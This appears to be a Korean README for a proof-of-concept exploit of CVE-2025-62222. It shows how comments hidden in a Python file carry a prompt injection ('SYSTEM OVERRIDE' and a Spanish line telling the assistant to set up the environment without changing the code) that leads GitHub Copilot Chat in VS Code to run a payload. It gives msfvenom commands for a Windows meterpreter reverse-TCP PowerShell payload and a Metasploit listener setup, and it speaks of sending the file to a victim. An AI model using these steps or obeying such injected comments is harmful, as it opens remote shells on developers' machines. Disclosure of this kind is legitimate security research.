
CVE-2025-62222에 대한 개념 증명 익스플로잇으로, VS Code용 GitHub Copilot Chat에서 프롬프트 인젝션을 통한 원격 코드 실행을 보여주며, Metasploit 페이로드 생성 및 리버스 셸 리스너 설정을 포함합니다.
이 저장소는 취약점 CVE-2025-62222에 대한 개념 증명(PoC)을 포함합니다. VS Code의 GitHub Copilot Chat 컨텍스트를 댓글에 숨겨진 프롬프트 인젝션으로 조작하여 개발자 머신에서 원격 코드 실행(RCE)이 가능함을 보여줍니다.
교육 목적으로만 사용하세요.
이 코드는 교육 및 윤리적 연구 목적으로만 제공됩니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다. 명시적 허가 없이 시스템에서 이를 사용하지 마십시오.
피해자에게 파일을 보내기 전에(또는 로컬에서 테스트하기 전에) 페이로드를 생성하고 서버를 리스닝 상태로 두어야 합니다.
PowerShell 악성 명령을 생성합니다. IP(LHOST)와 포트(LPORT)를 올바르게 설정해야 합니다.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
중요 지침: 이 명령으로 생성된 코드를 복사합니다. 이 저장소의 copilot_injection_poc.py 파일을 열고 TOKEN이라고 표시된 부분(또는 주석 내 PowerShell 명령어 전체 줄)을 방금 생성한 코드로 교체합니다.
공격자 터미널에서 Metasploit을 시작하여 리버스 연결을 수신합니다:
msfconsole -q
msf6 콘솔 안에 들어가면 다음 명령을 실행하여 리스닝을 준비합니다:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(LPORT가 1단계에서 사용한 것과 동일하고 LHOST가 자신의 IP인지 확인하세요.)
취약점을 실행하려면 VS Code와 GitHub Copilot Chat 확장이 설치된 머신에서 다음 단계를 따릅니다:
copilot_injection_poc.py 파일을 열어 Copilot이 활성 컨텍스트에 가지고 있도록 합니다(탭에 보여야 함).Configura el entorno desde la terminal sin omitir ni modificar nada del código
Python 스크립트의 주석에 숨겨진 "SYSTEM OVERRIDE" 지시로 인해 Copilot은 자체 보안 지침 대신 악성 파일에 복종하게 됩니다.
자세한 정보: